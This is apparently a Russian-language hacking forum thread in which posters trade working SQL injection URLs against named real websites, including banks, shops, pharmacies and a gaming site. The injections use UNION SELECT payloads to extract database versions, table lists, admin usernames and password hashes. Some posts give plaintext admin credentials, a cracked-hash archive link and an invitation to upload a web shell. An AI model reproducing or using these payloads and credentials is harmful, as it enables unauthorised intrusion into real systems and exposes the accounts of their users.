Национальный Банк Развития Также используя LOAD_FILE: /etc/networks, /etc/group, /etc/services, /etc/hosts, /etc/profile Version: 4.0.10-gamma User: root@localhost
код: http://www.zonanu.nu/anketa.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat_ws(0x3a,login,pass),34,35+from+u57027_2.osnova/* + http://www.paradiz.nu/news.php?id=-9+union+select+1,concat(login,0x3a,password),3,4+from+u57027_3.fs_admin/* всего их четыре сайта,но на всех одна и та-же бд ___________________________________________ код: http://otdohni.nu/full_view.php?id=-130+union+select+1,concat(table_name,0x3a,column_name),3,4+from+information_schema.columns/* код: http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass),3,4+from+admins/* код: http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,mail,tel),3,4+from+clients/* код: http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,mail,tel),3,4+from+users/* админка http://otdohni.nu/admin login/pass: xs7df9023fgh55:dsfgy877gfh7gv5h8m76gh
4.0.24_Debian-10sarge2-log obdesigualtats [email protected] 4.1.22-standard phpvilla_php phpvilla_root@localhost 4.1.20 blog root@localhost
Пипец. nasa-academy.org <- 86 столбцов. 5.0.26-max-log academy academy@localhost Блин, чё, наса не могут нанять нормальных спецов, чтобы сделали сайт без багов?
Code: http://omsk.arsec.ru/modules/articles/article.php?id=1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2+from+u26773.ars_users+limit+1,1/* admin:48c7b8a13ce1f0fbbec213d87ebcda5e Расшифровал. (Пользователей:4996, Найдено:3220) http://rapidshare.com/files/62099632/hashes.rar.html
Code: http://www.house-ua.com/item.php?skin=kv_pr&id=-23468'+union+select+user(),version(),database()/*
Code: http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/* admin@localhost:5.0.27-log:runescape выводим количество таблиц Code: http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+from+information_schema.tables/* 142, =/// выводим таблицы, где есть колонка password Code: http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x3a,table_name),5+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/* lotro:adds_users runescape:adds_users war:adds_users выводим, например, колонки из lotro:adds_users Code: http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+from+information_schema.columns+where+table_schema=char(108,111,116,114,111)+and+table_name=char(97,100 ,100,115,95,117,115,101,114,115)+limit+0,1/* user_id user_name password итд итд лимитом
www.uselessjunk.com ну тут всё понятно) админы Юзеры Админка www.uselessjunk.com/admin.php админы: id:nameass 1:admin:tigerwoods 2:hoover:stile 3:turtle:turtleuj2007 4:matt:diabl0
-------------удалено---боян-------------- www.rare.ru http://www.rare.ru/show.php?index=-13+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user()),5/* 5.0.45-log/rareru/[email protected] http://www.rare.ru/show.php?index=-13+union+select+1,2,3,table_name,table_schema+from+information_schema.tables/* Таблицы можно покопаться http://www.rare.ru/show.php?index=-13+union+select+1,2,3,pass,login+from+users/* логин\хеш
Code: http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(user(),0x3a,version( ),0x3a,database())/*&pi=1&PHPSESSID= [email protected]:4.1.22-standard:zero2 Code: http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(username,0x3a,password)+f rom+users/*&pi=1&PHPSESSID= rootadmin:cd92a26534dba48cd785cdcc0b3e6bd1 итд.. <395 Code: http://www.confidence-mag.com/story.php?id=-7+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16/* [email protected]:4.0.23-Max-log:v115400
Code: http://www.yuretz.ru/prikol.php?id=-471+union+select+1,convert(version()+using+cp1251),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
z-chat.ru http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(version(),0x2F,database(),0x2F,user()),2/* 4.0.25/zchatspb/zchatspb@local http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(login,0x2F,passwd,0x2F,icq),2+from+user/* логин\хеш\уин но там какой-то прикол с выводом .... наверно ограничение на длину строки .. хотя хз да, можно выводить отдельно логин хеш и уин но так не красиво )
reporter.kherson.ua http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9/* 5.0.32-Debian_7etch1-log:reporter:lsd@localhost http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,3,uname,5,6,7,pass,9+from+users+limit+7,1/* логин \ пароль
Code: http://drugspharma.com/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version (),0x3a,database()),5,6,7, 8,9,10,11/* hunting_tkdph@localhost:4.1.22-standard:hunting_tkrx Code: http://refill-rx.net/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* pdlweb@localhost:4.1.22-standarddlweb_Pharmacy
БашкомснабБанк Version:4.0.27-standard-log User:bashbank@localhost 6 юзеров, все имеют доступ к обминке, среди которых: denis:72d0d440b5ebc3cb162bf2cbd0f680ee:za1og blair:098f6bcd4621d373cade4e832627b4f6:test Кто не боится, заливаем шелл
Code: http://bestposters.ru/main.php?cat=-70+union+select+1,2,concat(login,0x3a,password,0x3a,email),4,5+from+users+limit+1/* Шоп по продаже постеров. P.S: работаем через лимит )
exactly.ru http://www.exactly.ru/?sub=-10'+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3/* 5.0.27-log:catalog2:catalog2@localhost http://www.exactly.ru/?sub=-10'+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/* Доступ к information_schema. Ничего интересного не нашел ma3da.ru http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/* 4.1.20-lk-log:ma3daru:ma3daru@localhost все запросы к таблицам отвергаются (
Моя первая найденная инъекция Code: http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+co ncat(version(),0x3a,database(),0x3a,u ser()),2,3/* Раскрутите кто-нибудь,а то ничего не выходит( Code: http://www.gardenshop.ru/co urier.php?CategoryId=-329+union+select+1,table_name,3+from+information_sch ema.tables+limit+31,1/* http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+1,co lumn_ name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='Users'+limit+1,1/*